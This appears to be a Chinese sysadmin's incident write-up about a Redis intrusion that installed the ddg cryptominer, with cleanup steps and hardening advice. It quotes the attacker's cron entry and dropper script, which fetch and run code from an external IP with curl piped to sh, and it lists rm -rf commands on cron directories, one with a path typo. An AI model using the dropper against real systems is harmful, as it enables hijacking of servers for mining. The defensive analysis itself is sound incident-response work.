今天同事说服务器很慢,查下进程发现CPU被占满,有一个进程命令是"wnTKYg"
找到原因是因为昨天装了redis没有做好安全预防工作,黑客利用redis漏洞进行挖矿
解决思路:
停止wnTKY进程,pkill -9 wnTKY
停止完发现进程还会自动启动
应该是计划任务里面设置任务了
crontab -e
*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh
要把个任务计划删除,同时执行crontab -l使新任务计划生效
通过i.sh脚本内容如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.1009" ]; then curl -fsSL http://218.248.40.228:9999/1009/ddg.$(uname -m) -o /tmp/ddg.1009 fi chmod +x /tmp/ddg.1009 && /tmp/ddg.1009 |
最后给挖矿文件授权可执行的权限,最后运行/tmp/ddg.1009这个挖矿文件
要同时删除这两个文件才行
rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/crontabs/root
或则直接删除 /var/spool/cron这个文件夹
rm -rf /var/spoo/cron
删除文件之后要在次删除相关进程,ddg.1009,这个进程要删除掉
ps -aux|grep ddg
防止REDIS再次攻击的方法
把默认的端口号6379给改了
把密码改的更复杂了
把bind xx.xx.x.x xx.xx.xx.xx改了
关闭挖矿的服务器访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP